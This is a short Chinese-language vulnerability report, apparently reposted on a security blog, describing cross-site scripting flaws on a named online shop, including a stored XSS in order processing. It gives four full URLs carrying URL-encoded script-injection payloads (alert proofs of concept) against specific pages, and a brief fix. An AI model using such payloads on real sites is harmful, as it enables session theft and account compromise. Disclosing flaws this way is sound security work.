未加星标

100e 多处包括订单处理处的XSS

字体大小 | |
[web安全 所属分类 web安全 | 发布者 店小二04 | 时间 20130117 | 作者 lxj616 ] 0人收藏点击收藏
100e 有几处XSS(到后台订单处理了。。。) 影响所有用户 尤其是订单管理员

有一个是在订单中生成,形成储存式XSS,问一问订单处理人员,应该看到过一个奇怪的弹窗:)

100e 多处包括订单处理处的XSS

http://www.ls100e.com/ns.asp?nowmenuid=500290&pageno=1&previd=500292&key=%22%3E%3Cscript%3Ealert%2891%29%3C%2Fscript%3E

100e 多处包括订单处理处的XSS

http://www.ls100e.com/shop.asp?key=1234%22%3E%3Cscript+%3Ealert%28796%29%3C%2Fscript%3E&previd=500017&nowmenuid=500010&Submit2=%CB%D1%CB%F7

100e 多处包括订单处理处的XSS

http://www.ls100e.com/shop_cart.asp?cc=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&prodid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&nowmenuid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E


100e 多处包括订单处理处的XSS


http://www.ls100e.com/shop_order.asp?orderid=500828%27%2Balert%28827%29%2B%27&nowmenuid=500010&tm=500010205251500828

修复方案:
把4个文件过滤一下

本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师

代码区博客精选文章
分页:12
转载请注明
本文标题:100e 多处包括订单处理处的XSS
本站链接:https://www.codesec.net/view/2616.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | web安全 | 评论(0) | 阅读(18)